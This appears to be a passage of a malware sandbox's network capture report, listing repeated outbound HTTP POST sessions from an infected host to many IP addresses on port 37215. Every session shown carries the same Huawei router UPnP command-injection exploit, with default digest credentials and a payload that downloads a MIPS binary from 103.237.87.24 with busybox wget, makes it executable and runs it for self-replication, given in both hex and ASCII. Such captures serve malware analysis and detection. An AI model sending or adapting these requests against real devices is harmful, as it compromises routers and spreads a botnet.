                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1747192.168.2.1356140154.51.101.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537064075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1748192.168.2.1340624197.165.184.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537132025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1749192.168.2.1336904197.213.199.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537225008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1750192.168.2.1336970197.173.35.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537235975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1751192.168.2.1352596197.70.224.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537240982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1752192.168.2.1338172121.209.154.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537241936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1753192.168.2.1359164157.12.79.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537249088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1754192.168.2.1355418157.19.151.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537303925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1755192.168.2.134214641.22.95.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537305117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1756192.168.2.1335416157.180.47.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537321091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 